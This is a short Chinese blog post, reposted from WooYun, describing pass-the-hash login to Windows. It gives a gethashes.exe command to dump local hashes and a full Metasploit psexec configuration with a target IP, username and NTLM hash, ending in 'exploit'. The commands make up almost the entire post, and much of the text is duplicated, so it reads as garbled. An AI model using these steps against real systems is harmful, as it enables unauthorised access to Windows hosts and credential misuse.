使用Hash直接登录Windows
使用gethashes.exe 获取本地hash:
[cce]gethashes.exe $local[/cce]
使用msf中的psexec来hash登陆:
[cce]
use exploit/windows/smb/psexec
show options
set RHOST 192.168.1.9(靶机IP)
set SMBUser molok(获取的用户名)
set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537(获取的hash)
exploit
[/cce]
逛乌云时发现的东东,特地贴在博客里,以备日后查阅~希望对各位也会有所帮助~
转自:https://drops.wooyun.org/tips/24
[cce]gethashes.exe $local[/cce]
使用msf中的psexec来hash登陆:
[cce]
use exploit/windows/smb/psexec
show options
set RHOST 192.168.1.9(靶机IP)
set SMBUser molok(获取的用户名)
set SMBPass 01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537(获取的hash)
exploit
[/cce]
逛乌云时发现的东东,特地贴在博客里,以备日后查阅~希望对各位也会有所帮助~
转自:https://drops.wooyun.org/tips/24
评论